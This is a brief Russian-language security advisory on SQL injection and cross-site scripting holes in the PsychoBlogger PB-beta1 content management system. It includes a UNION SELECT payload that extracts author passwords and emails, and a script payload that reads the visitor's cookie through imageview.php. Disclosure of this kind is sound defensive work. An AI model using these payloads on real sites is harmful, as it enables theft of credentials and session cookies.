Программа: PsychoBlogger PB-beta1
Несколько уязвимостей обнаружены в PsychoBlogger content management system. Удаленный пользователь внедрить SQL команды и выполнить XSS нападение.
Уязвимость обнаружена в параметре shoutlimit в сценарии
shouts.php и в параметре blogid в сценарии comments.php. Удаленный пользователь может выполнить произвольные SQL команды на основной базе данных:
1 and 'a'='z' union select
ba.authorid,name,pwd,email,url,ba.active,comments,be.blogid from
blog_authors ba, blog_entries be where 'a'='a'
Также XSS уязвимость обнаружена в параметре desc в сценарии imageview.php:
http://[target]/imageview.php? desc=</title><script>alert(document.cookie)
</script>